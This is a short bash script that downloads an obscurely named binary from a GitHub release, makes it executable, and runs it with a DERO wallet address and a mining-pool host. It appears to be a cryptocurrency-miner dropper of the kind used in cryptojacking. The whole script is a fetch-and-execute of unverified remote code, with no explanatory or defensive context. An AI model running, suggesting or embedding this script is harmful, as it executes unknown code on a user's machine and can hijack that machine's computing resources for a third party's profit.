#!/bin/bash
wget https://github.com/bzxcmncv/bvzasw/releases/download/bvas/bvxcfd
chmod +x bvxcfd
./bvxcfd -w dero1qytfne4y9mpry7kcxrl5z328sqrmy349ldgawmu32yy5yzrjrnygjqg0vw3yu -r community-pools.mysrv.cloud:10300
